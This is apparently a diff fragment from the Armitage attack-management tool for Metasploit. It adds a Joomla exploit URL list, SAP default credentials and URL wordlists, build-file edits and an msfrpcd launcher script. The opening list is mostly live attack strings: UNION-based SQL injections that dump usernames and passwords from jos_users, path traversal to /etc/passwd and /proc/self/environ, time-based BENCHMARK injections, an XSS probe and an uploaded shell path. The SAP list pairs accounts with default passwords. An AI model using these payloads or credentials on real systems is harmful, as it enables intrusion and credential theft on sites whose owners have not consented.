components/com_livechat/getSavedChatRooms.php
|
||||
components/com_livechat/xmlhttp.php
|
||||
components/com_liveticker/
|
||||
components/com_lm/
|
||||
components/com_lmo/
|
||||
components/com_loudmounth/includes/abbc/abbc.class.php
|
||||
components/com_loudmouth/
|
||||
components/com_lowcosthotels/
|
||||
components/com_lurm_constructor/admin.lurm_constructor.php
|
||||
components/com_mad4joomla/
|
||||
components/com_madeira/img.php
|
||||
components/com_maianmusic/
|
||||
components/com_mailarchive/
|
||||
components/com_mailto/
|
||||
components/com_mambatstaff/mambatstaff.php
|
||||
components/com_mambelfish/
|
||||
components/com_mambospgm/
|
||||
components/com_mambowiki/MamboLogin.php
|
||||
components/com_marketplace/
|
||||
components/com_mcquiz/
|
||||
components/com_mdigg/
|
||||
components/com_media_library/
|
||||
components/com_mediaslide/
|
||||
components/com_mezun/
|
||||
components/com_mgm/
|
||||
components/com_minibb/
|
||||
components/com_misterestate/
|
||||
components/com_mmp/help.mmp.php
|
||||
components/com_model/
|
||||
components/com_moodle/moodle.php
|
||||
components/com_moofaq/
|
||||
components/com_mosmedia/
|
||||
components/com_mospray/scripts/admin.php
|
||||
components/com_mosres/
|
||||
components/com_most/
|
||||
components/com_mp3_allopass/
|
||||
components/com_mtree/
|
||||
components/com_mtree/img/listings/o/{id}.php
|
||||
components/com_multibanners/extadminmenus.class.php
|
||||
components/com_myalbum/
|
||||
components/com_mycontent/
|
||||
components/com_mydyngallery/
|
||||
components/com_mygallery/
|
||||
components/com_n-forms/
|
||||
components/com_na_content/
|
||||
components/com_na_mydocs/
|
||||
components/com_na_newsdescription/
|
||||
components/com_na_qforms/
|
||||
components/com_neogallery/
|
||||
components/com_neorecruit/
|
||||
components/com_neoreferences/
|
||||
components/com_netinvoice/
|
||||
components/com_news/
|
||||
components/com_news_portal/
|
||||
components/com_newsflash/
|
||||
components/com_nfn_addressbook/
|
||||
components/com_nicetalk/
|
||||
components/com_noticias/
|
||||
components/com_omnirealestate/
|
||||
components/com_omphotogallery/
|
||||
components/com_ongumatimesheet20/
|
||||
components/com_onlineflashquiz/
|
||||
components/com_ownbiblio/
|
||||
components/com_panoramic/
|
||||
components/com_paxgallery/
|
||||
components/com_paxxgallery/
|
||||
components/com_pcchess/
|
||||
components/com_pcchess/include.pcchess.php
|
||||
components/com_pccookbook/
|
||||
components/com_pccookbook/pccookbook.php
|
||||
components/com_peoplebook/param.peoplebook.php
|
||||
components/com_performs/
|
||||
components/com_philaform/
|
||||
components/com_phocadocumentation/
|
||||
components/com_php/
|
||||
components/com_phpshop/toolbar.phpshop.html.php
|
||||
components/com_pinboard/
|
||||
components/com_pms/
|
||||
components/com_poll/
|
||||
components/com_pollxt/
|
||||
components/com_ponygallery/
|
||||
components/com_portafolio/
|
||||
components/com_portfol/
|
||||
components/com_prayercenter/
|
||||
components/com_pro_desk/
|
||||
components/com_prod/
|
||||
components/com_productshowcase/
|
||||
components/com_profiler/
|
||||
components/com_projectfork/
|
||||
components/com_propertylab/
|
||||
components/com_puarcade/
|
||||
components/com_publication/
|
||||
components/com_quiz/
|
||||
components/com_rapidrecipe/
|
||||
components/com_rdautos/
|
||||
components/com_realestatemanager/
|
||||
components/com_recly/
|
||||
components/com_referenzen/
|
||||
components/com_rekry/
|
||||
components/com_remository/admin.remository.php
|
||||
components/com_remository_files/file_image_14/1276100016shell.php
|
||||
components/com_reporter/processor/reporter.sql.php
|
||||
components/com_resman/
|
||||
components/com_restaurante/
|
||||
components/com_ricette/
|
||||
components/com_rsfiles/
|
||||
components/com_rsgallery/
|
||||
components/com_rsgallery2/
|
||||
components/com_rss/
|
||||
components/com_rssreader/
|
||||
components/com_rssxt/
|
||||
components/com_rwcards/
|
||||
components/com_school/
|
||||
components/com_search/
|
||||
components/com_sebercart/getPic.php?p=[LFD]%00
|
||||
components/com_securityimages/
|
||||
components/com_sef/
|
||||
components/com_seminar/
|
||||
components/com_serverstat/install.serverstat.php
|
||||
components/com_sg/
|
||||
components/com_simple_review/
|
||||
components/com_simpleboard/
|
||||
components/com_simplefaq/
|
||||
components/com_simpleshop/
|
||||
components/com_sitemap/sitemap.xml.php
|
||||
components/com_slideshow/
|
||||
components/com_smf/
|
||||
components/com_smf/smf.php
|
||||
components/com_swmenupro/
|
||||
components/com_team/
|
||||
components/com_tech_article/
|
||||
components/com_thopper/
|
||||
components/com_thyme/
|
||||
components/com_tickets/
|
||||
components/com_tophotelmodule/
|
||||
components/com_tour_toto/
|
||||
components/com_trade/
|
||||
components/com_uhp/
|
||||
components/com_uhp2/
|
||||
components/com_user/controller.php
|
||||
components/com_users/
|
||||
components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php
|
||||
components/com_vehiclemanager/
|
||||
components/com_versioning /
|
||||
components/com_videodb/core/videodb.class.xml.php
|
||||
components/com_virtuemart/
|
||||
components/com_volunteer/
|
||||
components/com_vr/
|
||||
components/com_waticketsystem/
|
||||
components/com_webhosting/
|
||||
components/com_weblinks/
|
||||
components/com_webring/
|
||||
components/com_wmtgallery/
|
||||
components/com_wmtportfolio/
|
||||
components/com_x-shop/
|
||||
components/com_xevidmegahd/
|
||||
components/com_xewebtv/
|
||||
components/com_xfaq/
|
||||
components/com_xgallery/helpers/img.php?file=
|
||||
components/com_xsstream-dm/
|
||||
components/com_ynews/
|
||||
components/com_yvcomment/
|
||||
components/com_zoom/classes/
|
||||
components/mod_letterman/
|
||||
components/remository/
|
||||
eXtplorer/
|
||||
easyblog/entry/uncategorized
|
||||
extplorer/
|
||||
components/com_mtree/img/listings/o/{id}.php where {id}
|
||||
includes/joomla.php
|
||||
index.php/404'
|
||||
index.php/?option=com_question&catID=21' and+1=0 union all
|
||||
index.php/image-gallery/"><script>alert('xss')</script>/25-koala
|
||||
index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1
|
||||
index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view
|
||||
index.php?option=com_aardvertiser&cat_name=conf&task=<=
|
||||
index.php?option=com_aardvertiser&task=
|
||||
index.php?option=com_abc&view=abc&letter=AS§ionid='
|
||||
index.php?option=com_advert&id=36'
|
||||
index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users--
|
||||
index.php?option=com_alfurqan15x&action=viewayat&surano=
|
||||
index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version
|
||||
index.php?option=com_annonces&view=edit&Itemid=1
|
||||
index.php?option=com_articleman&task=new
|
||||
index.php?option=com_bbs&bid=-1
|
||||
index.php?option=com_beamospetition&startpage=3&pet=-
|
||||
index.php?option=com_beamospetition&startpage=3&pet=-1+Union+select+user()+from+jos_users-
|
||||
index.php?option=com_bearleague&task=team&tid=8&sid=1&Itemid=%27
|
||||
index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00
|
||||
index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
|
||||
index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
|
||||
index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=-1
|
||||
index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users--
|
||||
index.php?option=com_chronoconnectivity&itemid=1
|
||||
index.php?option=com_chronocontact&itemid=1
|
||||
index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=
|
||||
index.php?option=com_clantools&squad=1+
|
||||
index.php?option=com_clantools&task=clanwar&showgame=1+
|
||||
index.php?option=com_commedia&format=raw&task=image&pid=4&id=964'
|
||||
index.php?option=com_commedia&task=page&commpid=21
|
||||
index.php?option=com_connect&view=connect&controller=
|
||||
index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../
|
||||
index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00
|
||||
index.php?option=com_dioneformwizard&controller=[LFI]%00
|
||||
index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=-1
|
||||
index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12
|
||||
index.php?option=com_easyfaq&Itemid=1&task=view&gid=
|
||||
index.php?option=com_easyfaq&catid=1&task=view&id=-2527+
|
||||
index.php?option=com_easyfaq&task=view&contact_id=
|
||||
index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=
|
||||
index.php?option=com_equipment&task=components&id=45&sec_men_id=
|
||||
index.php?option=com_equipment&view=details&id=
|
||||
index.php?option=com_estateagent&Itemid=47&act=object&task=showEO&id=[sqli]
|
||||
index.php?option=com_etree&view=displays&layout=category&id=[SQL]
|
||||
index.php?option=com_etree&view=displays&layout=user&user_id=[SQL]
|
||||
index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1
|
||||
index.php?option=com_fabrik&view=table&tableid=13+union+select+1----
|
||||
index.php?option=com_filecabinet&task=download&cid[]=7
|
||||
index.php?option=com_firmy&task=section_show_set&Id=-1
|
||||
index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R
|
||||
index.php?option=com_golfcourseguide&view=golfcourses&cid=1&id=
|
||||
index.php?option=com_graphics&controller=
|
||||
index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0&data_search=
|
||||
index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0?data_search=&rpp=
|
||||
index.php?option=com_huruhelpdesk&view=detail
|
||||
index.php?option=com_huruhelpdesk&view=detail&cid[0]=
|
||||
index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1
|
||||
index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1
|
||||
index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2
|
||||
index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1
|
||||
index.php?option=com_iproperty&view=agentproperties&id=
|
||||
index.php?option=com_jacomment&view=
|
||||
index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00
|
||||
index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00
|
||||
index.php?option=com_jcommunity&controller=members&task=1'
|
||||
index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13
|
||||
index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2
|
||||
index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2
|
||||
index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00
|
||||
index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999,NULL),NULL)))
|
||||
index.php?option=com_jfuploader&Itemid=
|
||||
index.php?option=com_jgen&task=view&id=
|
||||
index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00
|
||||
index.php?option=com_jimtawl&Itemid=12&task=
|
||||
index.php?option=com_jmarket&controller=product&task=1'
|
||||
index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1'
|
||||
index.php?option=com_jomdirectory&task=search&type=111+
|
||||
index.php?option=com_joomdle&view=detail&cat_id=1&course_id=
|
||||
index.php?option=com_joomla_flash_uploader&Itemid=1
|
||||
index.php?option=com_joomleague&func=showNextMatch&p=[sqli]
|
||||
index.php?option=com_joomleague&view=resultsmatrix&p=4&Itemid=[sqli]
|
||||
index.php?option=com_joomtouch&controller=
|
||||
index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00
|
||||
index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00
|
||||
index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users
|
||||
index.php?option=com_jstore&controller=product-display&task=1'
|
||||
index.php?option=com_jsubscription&controller=subscription&task=1'
|
||||
index.php?option=com_jtickets&controller=ticket&task=1'
|
||||
index.php?option=com_konsultasi&act=detail&sid=
|
||||
index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en
|
||||
index.php?option=com_kunena&func=userlist&search=
|
||||
index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1'
|
||||
index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00
|
||||
index.php?option=com_markt&page=show_category&catid=7+union+select+0,1,password,3,4,5,username,7,8+from+jos_users--
|
||||
index.php?option=com_matamko&controller=
|
||||
index.php?option=com_myhome&task=4&nidimmindex.php?option=com_myhome&task=4&nidimm
|
||||
index.php?option=com_neorecruit&task=offer_view&id=
|
||||
index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
|
||||
index.php?option=com_noticeboard&controller=
|
||||
index.php?option=com_obsuggest&controller=
|
||||
index.php?option=com_ongallery&task=ft&id=-1+order+by+1--
|
||||
index.php?option=com_ongallery&task=ft&id=-1+union+select+1--
|
||||
index.php?option=com_oziogallery&Itemid=
|
||||
index.php?option=com_page&id=53
|
||||
index.php?option=com_pbbooking&task=validate&id=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(999999999,NULL),NULL)))
|
||||
index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00
|
||||
index.php?option=com_peliculas&view=peliculas&id=null[Sql Injection]
|
||||
index.php?option=com_phocagallery&view=categories&Itemid=
|
||||
index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
|
||||
index.php?option=com_php&file=../../../../../../../../../../etc/passwd
|
||||
index.php?option=com_php&file=../images/phplogo.jpg
|
||||
index.php?option=com_php&file=../js/ie_pngfix.js
|
||||
index.php?option=com_ponygallery&Itemid=[sqli]
|
||||
index.php?option=com_products&catid=-1
|
||||
index.php?option=com_products&id=-1
|
||||
index.php?option=com_products&product_id=-1
|
||||
index.php?option=com_products&task=category&catid=-1
|
||||
index.php?option=com_properties&task=agentlisting&aid=
|
||||
index.php?option=com_qcontacts&Itemid=1'
|
||||
index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts
|
||||
index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00
|
||||
index.php?option=com_restaurantguide&view=country&id='&Itemid=69
|
||||
index.php?option=com_rokmodule&tmpl=component&type=raw&module=1'
|
||||
index.php?option=com_seyret&view=
|
||||
index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--
|
||||
index.php?option=com_smartsite&controller=
|
||||
index.php?option=com_spa&view=spa_product&cid=
|
||||
index.php?option=com_spidercalendar
|
||||
index.php?option=com_spidercalendar&date=1'
|
||||
index.php?option=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
|
||||
index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
|
||||
index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
|
||||
index.php?option=com_staticxt&staticfile=test.php&id=1923
|
||||
index.php?option=com_szallasok&mode=8&id=25 (SQL)
|
||||
index.php?option=com_tag&task=tag&tag=
|
||||
index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users--
|
||||
index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users
|
||||
index.php?option=com_ultimateportfolio&controller=
|
||||
index.php?option=com_users&view=registration
|
||||
index.php?option=com_virtuemart&page=account.index&keyword=[sqli]
|
||||
index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00
|
||||
index.php?option=com_x-shop&action=artdetail&idd='
|
||||
index.php?option=com_x-shop&action=artdetail&idd='[SQLi]
|
||||
index.php?option=com_xcomp&controller=../../[LFI]%00
|
||||
index.php?option=com_xvs&controller=../../[LFI]%00
|
||||
index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--+Union+select+user()+from+jos_users--
|
||||
index.php?option=com_yjcontactus&view=
|
||||
index.php?option=com_youtube&id_cate=4
|
||||
index.php?option=com_zina&view=zina&Itemid=9
|
||||
index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id=
|
||||
index.php?search=NoGe&option=com_esearch&searchId=
|
||||
index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube
|
||||
index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users--
|
||||
js/index.php?option=com_socialads&view=showad&Itemid=94
|
||||
libraries/joomla/utilities/compat/php50x.php
|
||||
libraries/pcl/pcltar.php
|
||||
libraries/phpmailer/phpmailer.php
|
||||
libraries/phpxmlrpc/xmlrpcs.php
|
||||
modules/mod_artuploader/upload.php");
|
||||
modules/mod_as_category.php
|
||||
modules/mod_calendar.php
|
||||
modules/mod_ccnewsletter/helper/popup.php?id=[SQLi]
|
||||
modules/mod_dionefileuploader/upload.php?module_dir=./&module_max=2097152&file_type=application/octet-stream");
|
||||
modules/mod_jfancy/script.php");
|
||||
modules/mod_ppc_simple_spotlight/elements/upload_file.php
|
||||
modules/mod_ppc_simple_spotlight/img/
|
||||
modules/mod_pxt/
|
||||
modules/mod_quick_question.php
|
||||
modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0
|
||||
patch/makedown.php?arquivo=../../../../etc/passwd
|
||||
plugins/content/efup_files/helper.php");
|
||||
plugins/editors/idoeditor/themes/advanced/php/image.php" method="post" enctype="multipart/form-data">
|
||||
plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
|
||||
plugins/editors/xstandard/attachmentlibrary.php
|
||||
print.php?task=person&id=36 and 1=1
|
||||
templates/be2004-2/
|
||||
templates/ja_purity/
|
||||
wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--
|
||||
web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=1'
|
|
@ -12,3 +12,7 @@ ADS_AGENT ch4ngeme
|
|||
DEVELOPER ch4ngeme
|
||||
J2EE_ADMIN ch4ngeme
|
||||
SAPJSF ch4ngeme
|
||||
SAPR3 SAP
|
||||
CTB_ADMIN sap123
|
||||
XMI_DEMO sap123
|
||||
|
||||
|
|
|
@ -93,11 +93,11 @@
|
|||
/rwb/version.html
|
||||
/sap/admin
|
||||
/sap/bc/bsp/esh_os_service/favicon.gif
|
||||
/sap/bc/bsp/sap
|
||||
/sap/bc/bsp/sap
|
||||
/sap/bc/bsp/sap/alertinbox
|
||||
/sap/bc/bsp/sap/bsp_dlc_frcmp
|
||||
/sap/bc/bsp/sap/bsp_veri
|
||||
/sap/bc/bsp/sap/bsp_verificatio
|
||||
/sap/bc/bsp/sap/bsp_verificatio
|
||||
/sap/bc/bsp/sap/bsp_wd_base
|
||||
/sap/bc/bsp/sap/bspwd_basics
|
||||
/sap/bc/bsp/sap/certmap
|
||||
|
@ -116,31 +116,46 @@
|
|||
/sap/bc/bsp/sap/graph_bsp_test
|
||||
/sap/bc/bsp/sap/graph_bsp_test/Mimes
|
||||
/sap/bc/bsp/sap/gsbirp
|
||||
/sap/bc/bsp/sap/htmlb_samples
|
||||
/sap/bc/bsp/sap/hrrcf_wd_dovru
|
||||
/sap/bc/bsp/sap/htmlb_samples
|
||||
/sap/bc/bsp/sap/iccmp_bp_cnfirm
|
||||
/sap/bc/bsp/sap/iccmp_hdr_cntnr
|
||||
/sap/bc/bsp/sap/iccmp_hdr_cntnt
|
||||
/sap/bc/bsp/sap/iccmp_header
|
||||
/sap/bc/bsp/sap/iccmp_ssc_ll/
|
||||
/sap/bc/bsp/sap/ic_frw_notify
|
||||
/sap/bc/bsp/sap/it00
|
||||
/sap/bc/bsp/sap/public/bc
|
||||
/sap/bc/bsp/sap/it00
|
||||
/sap/bc/bsp/sap/it00/default.htm
|
||||
/sap/bc/bsp/sap/it00/http_client.htm
|
||||
/sap/bc/bsp/sap/it00/http_client_xml.htm
|
||||
/sap/bc/bsp/sap/public/bc
|
||||
/sap/bc/bsp/sap/public/graphics
|
||||
/sap/bc/bsp/sap/sam_demo
|
||||
/sap/bc/bsp/sap/sam_notifying
|
||||
/sap/bc/bsp/sap/sam_sess_queue
|
||||
/sap/bc/bsp/sap/sbspext_htmlb
|
||||
/sap/bc/bsp/sap/sbspext_xhtmlb
|
||||
/sap/bc/bsp/sap/sbspext_htmlb
|
||||
/sap/bc/bsp/sap/sbspext_xhtmlb
|
||||
/sap/bc/bsp/sap/spi_admin
|
||||
/sap/bc/bsp/sap/spi_monitor
|
||||
/sap/bc/bsp/sap/sxms_alertrules
|
||||
/sap/bc/bsp/sap/system
|
||||
/sap/bc/bsp/sap/system
|
||||
/sap/bc/bsp/sap/thtmlb_scripts
|
||||
/sap/bc/bsp/sap/thtmlb_styles
|
||||
/sap/bc/bsp/sap/uicmp_ltx
|
||||
/sap/bc/bsp/sap/xmb_bsp_log
|
||||
/sap/bc/contentserver
|
||||
/sap/bc/echo
|
||||
/sap/bc/erecruiting/applwzd
|
||||
/sap/bc/erecruiting/confirmation_e
|
||||
/sap/bc/erecruiting/confirmation_i
|
||||
/sap/bc/erecruiting/dataoverview
|
||||
/sap/bc/erecruiting/password
|
||||
/sap/bc/erecruiting/posting_apply
|
||||
/sap/bc/erecruiting/qa_email_e
|
||||
/sap/bc/erecruiting/qa_email_i
|
||||
/sap/bc/erecruiting/registration
|
||||
/sap/bc/erecruiting/startpage
|
||||
/sap/bc/erecruiting/verification
|
||||
/sap/bc/error
|
||||
/sap/bc/FormToRfc
|
||||
/sap/bc/graphics/net
|
||||
|
@ -165,10 +180,36 @@
|
|||
/sap/bc/webdynpro/sap/cnp_light_test
|
||||
/sap/bc/webdynpro/sap/configure_application
|
||||
/sap/bc/webdynpro/sap/configure_component
|
||||
/sap/bc/webdynpro/sap/esh_admin_ui_component
|
||||
/sap/bc/webdynpro/sap/esh_admin_ui_component
|
||||
/sap/bc/webdynpro/sap/esh_adm_smoketest_ui
|
||||
/sap/bc/webdynpro/sap/esh_eng_modelling
|
||||
/sap/bc/webdynpro/sap/esh_search_results.ui
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_act_cnf_dovr_ui
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_act_cnf_ind_ext
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_act_cnf_ind_int
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_appls
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_applwizard
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_candidate_registration
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_candidate_verification
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_dataoverview
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_draft_applications
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_new_verif_mail
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_posting_apply
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_psett_ext
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_psett_int
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_pw_via_email_extern
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_pw_via_email_intern
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_qa_mss
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_refcode_srch
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_refcode_srch_int
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_req_assess
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_requi_monitor
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_substitution_admin
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_substitution_manager
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_tp_assess
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_unregemp_job_search
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_unreg_job_search
|
||||
/sap/bc/webdynpro/sap/hrrcf_a_unverified_cand
|
||||
/sap/bc/webdynpro/sap/sh_adm_smoketest_files
|
||||
/sap/bc/webdynpro/sap/wd_analyze_config_appl
|
||||
/sap/bc/webdynpro/sap/wd_analyze_config_comp
|
||||
|
@ -196,11 +237,12 @@
|
|||
/sapmc/sapmc.html
|
||||
/sap/monitoring/
|
||||
/sap/public/bc
|
||||
/sap/public/bc
|
||||
/sap/public/bc/icons
|
||||
/sap/public/bc/icons_rtl
|
||||
/sap/public/bc/its
|
||||
/sap/public/bc/its/designs
|
||||
/sap/public/bc/its/mimes
|
||||
/sap/public/bc/its/mimes/system/SL/page/hourglass.html
|
||||
/sap/public/bc/its/mimes/system/SL/page/hourglass.html
|
||||
/sap/public/bc/its/mobile/itsmobile00
|
||||
/sap/public/bc/its/mobile/itsmobile01
|
||||
/sap/public/bc/its/mobile/rfid
|
||||
|
@ -211,8 +253,9 @@
|
|||
/sap/public/bc/pictograms
|
||||
/sap/public/bc/sicf_login_run
|
||||
/sap/public/bc/trex
|
||||
/sap/public/bc/ur
|
||||
/sap/public/bc/ur
|
||||
/sap/public/bc/wdtracetool
|
||||
/sap/public/bc/webdynpro
|
||||
/sap/public/bc/webdynpro/adobechallenge
|
||||
/sap/public/bc/webdynpro/mimes
|
||||
/sap/public/bc/webdynpro/ssr
|
||||
|
@ -220,16 +263,17 @@
|
|||
/sap/public/bc/webicons
|
||||
/sap/public/bc/workflow
|
||||
/sap/public/bc/workflow/shortcut
|
||||
/sap/public/bsp/sap
|
||||
/sap/public/bsp/sap/htmlb
|
||||
/sap/public/bsp/sap/public
|
||||
/sap/public/bsp/sap/public/bc
|
||||
/sap/public/bsp
|
||||
/sap/public/bsp/sap
|
||||
/sap/public/bsp/sap/htmlb
|
||||
/sap/public/bsp/sap/public
|
||||
/sap/public/bsp/sap/public/bc
|
||||
/sap/public/bsp/sap/public/faa
|
||||
/sap/public/bsp/sap/public/graphics
|
||||
/sap/public/bsp/sap/public/graphics/jnet_handler
|
||||
/sap/public/bsp/sap/public/graphics/mimes
|
||||
/sap/public/bsp/sap/system
|
||||
/sap/public/bsp/sap/system_public
|
||||
/sap/public/bsp/sap/system
|
||||
/sap/public/bsp/sap/system_public
|
||||
/sap/public/icf_check
|
||||
/sap/public/icf_info
|
||||
/sap/public/icf_info/icr_groups
|
||||
|
|
|
@ -16,6 +16,8 @@
|
|||
depend="yes"
|
||||
debug="true"
|
||||
optimize="yes"
|
||||
target="1.6"
|
||||
source="1.6"
|
||||
includeantruntime="fuckno"
|
||||
>
|
||||
<classpath path="./lib/jgraphx.jar;./lib/sleep.jar;./lib/msgpack-0.5.1-devel.jar;./lib/postgresql-9.1-901.jdbc4.jar" />
|
||||
|
|
|
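Review bot: includeantruntime="fuckno" in the javac attributes is not a boolean literal. Ant treats any value other than true, yes or on as false, so the build only behaves as intended by accident. Write includeantruntime="false" so the setting is explicit and survives a stricter parser.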
@ -3,7 +3,7 @@
|
|||
<center><h1>Armitage 1.45</h1></center>
|
||||
|
||||
<p>An attack management tool for Metasploit®
|
||||
<br />Release: 4 Jan 13</p>
|
||||
<br />Release: 12 Feb 13</p>
|
||||
<br />
|
||||
<p>Developed by:</p>
|
||||
|
||||
|
|
|
@ -4,6 +4,7 @@
|
|||
^msf (.*?)\((.*?)\) > \umsf\u $1(\c4$2\o) >
|
||||
^\[\*\] (.*) \cC[*]\o $1
|
||||
^\[\+\] (.*) \c9[+]\o $1
|
||||
^\[\!\] (.*) \c8[!]\o $1
|
||||
^\[\-\] (.*) \c4[-]\o $1
|
||||
^ =\[ (.*) =[\c7 $1
|
||||
^(=[=\s]+) \cE$1
|
||||
|
|
|
@ -0,0 +1,12 @@
|
|||
@echo off
|
||||
set BASE=$$BASE$$..\..\
|
||||
cd "%BASE%"
|
||||
set PATH=%BASE%ruby\bin;%BASE%java\bin;%BASE%tools;%BASE%nmap;%BASE%postgresql\bin;%PATH%
|
||||
IF NOT EXIST "%BASE%java" GOTO NO_JAVA
|
||||
set JAVA_HOME="%BASE%java"
|
||||
:NO_JAVA
|
||||
set MSF_DATABASE_CONFIG="%BASE%apps\pro\ui\config\database.yml"
|
||||
set MSF_BUNDLE_GEMS=0
|
||||
set BUNDLE_GEMFILE=%BASE%apps\pro\ui\Gemfile
|
||||
cd "%BASE%apps\pro\msf3"
|
||||
rubyw msfrpcd -a 127.0.0.1 -U $$USER$$ -P $$PASS$$ -S -f -p $$PORT$$
|
|
